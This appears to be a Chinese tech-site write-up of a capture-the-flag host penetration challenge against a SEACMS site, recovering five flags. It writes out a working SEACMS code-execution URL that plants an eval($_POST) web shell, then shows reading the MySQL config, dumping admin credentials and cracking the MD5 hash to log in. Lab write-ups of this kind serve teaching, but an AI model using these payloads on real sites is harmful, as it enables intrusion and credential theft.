溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

CTF主機滲透實戰(zhàn)分析

發(fā)布時間:2022-01-07 16:10:29 來源:億速云 閱讀:333 作者:iii 欄目:網(wǎng)絡安全

這篇文章主要介紹“CTF主機滲透實戰(zhàn)分析”的相關知識,小編通過實際案例向大家展示操作過程,操作方法簡單快捷,實用性強,希望這篇“CTF主機滲透實戰(zhàn)分析”文章能幫助大家解決問題。

實戰(zhàn)此題如下:

CTF主機滲透實戰(zhàn)分析

此道題一共需要拿到5個flag,從哪里入手呢?

第一步:首先我們打開連接地址:http://202.0.0.206

CTF主機滲透實戰(zhàn)分析

第二步:漏洞分析

根據(jù)分析,此道題是一個SEACMS的平臺系統(tǒng)

該版本通過其他論壇平臺了解到存在一個代碼執(zhí)行漏洞。Exp:/search.php?searchtype=5&tid=&area=phpinfo()。我們來試試此漏洞能夠利用,直接在后面的phpinfo()就可以執(zhí)行任意php代碼直接訪問http:// 202.0.0.206/search.php?searchtype=5&tid=&area=phpinfo()發(fā)現(xiàn)phpinfo()執(zhí)行成功了,說明該漏洞存在。

CTF主機滲透實戰(zhàn)分析

我們嘗試看看源碼中有沒有flag,右鍵打開此頁面的源碼,在源碼果然有一個flag= flag1{ac727d1a3130e4093b3665120a3240a5}

CTF主機滲透實戰(zhàn)分析

第三步:一句話木馬利用

接下來我們利用一句話木馬來利用。

使用使用exp:/search.php?searchtype=5&tid=&area=eval($_POST[simple])構(gòu)造一句話小馬。

CTF主機滲透實戰(zhàn)分析

打開工具菜刀,在地址欄中填寫

http://202.0.0.206/search.php?searchtype=5&tid=&area=eval($_POST[simple]),密碼為simple,點擊添加

CTF主機滲透實戰(zhàn)分析

連接成功了,如下:

CTF主機滲透實戰(zhàn)分析

第四步:胡亂搗騰

接下來就是耗時的去找了,如小偷進家,沒有目的只能胡亂的翻了!

費時很久在 /home目錄下發(fā)現(xiàn)有key文件,打開文件,獲得flag2=

flag2{6634eaf4ce34a82da12d835c1ed86a24}

CTF主機滲透實戰(zhàn)分析

在 /etc目錄下的my.cnf關于數(shù)據(jù)庫mysql的配置文件。發(fā)現(xiàn)flag3和數(shù)據(jù)庫相關賬戶信息。flag3{da04113d21f02f0ebfd281d0a7a64e34},并且得到了數(shù)據(jù)庫的密碼。

CTF主機滲透實戰(zhàn)分析

第五步:數(shù)據(jù)庫操作

在上一步獲取到關于數(shù)據(jù)庫的用戶名和密碼,使用用戶名和密碼,重新配置菜刀,連接數(shù)據(jù)庫。

CTF主機滲透實戰(zhàn)分析

提交打開數(shù)據(jù)庫,在seacms中的flag表中,找到一個flag= flag4{32730c5cc0bd7bb8ffde4457649fd409}

CTF主機滲透實戰(zhàn)分析

分別在數(shù)據(jù)庫中查詢seacms的后臺的賬號密碼

SELECT `name` FROM `sea_admin`

SELECT `password` FROM `sea_admin`

CTF主機滲透實戰(zhàn)分析

第六步:密碼破解

取到的密碼是MD5加密,密碼為:23a7bbd73250516f069d 百度MD5在線解密,發(fā)現(xiàn)該加密值是20位,使用了和dedecms一樣的加密方式,將該加密值的前三位和最后一位去掉,就是16位的MD5加密,在線解密結(jié)果是admin123。

CTF主機滲透實戰(zhàn)分析

第六步:找后臺登錄頁面

接下來找到網(wǎng)站的后臺登錄頁面,我們這里使用DirBuster工具。

CTF主機滲透實戰(zhàn)分析CTF主機滲透實戰(zhàn)分析

使用在數(shù)據(jù)庫中已經(jīng)獲得的用用戶名和密碼,登錄網(wǎng)站后臺密碼是admin123。

CTF主機滲透實戰(zhàn)分析

好了,登錄成功,我們拿到了后臺登錄頁面,并可以使用管理員賬號登錄。

CTF主機滲透實戰(zhàn)分析

第七步:胡亂搗騰

在后臺逛了半天,終于在網(wǎng)站后臺查找計劃任務時,發(fā)現(xiàn)key5。

flag5{f01cbadfd0daee0d65c2502a38581558}

CTF主機滲透實戰(zhàn)分析

最后,到此為止,5個flag全部找出來了,接下來我們把5個flag放入答題框。

CTF主機滲透實戰(zhàn)分析

關于“CTF主機滲透實戰(zhàn)分析”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關的知識,可以關注億速云行業(yè)資訊頻道,小編每天都會為大家更新不同的知識點。

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

ctf
AI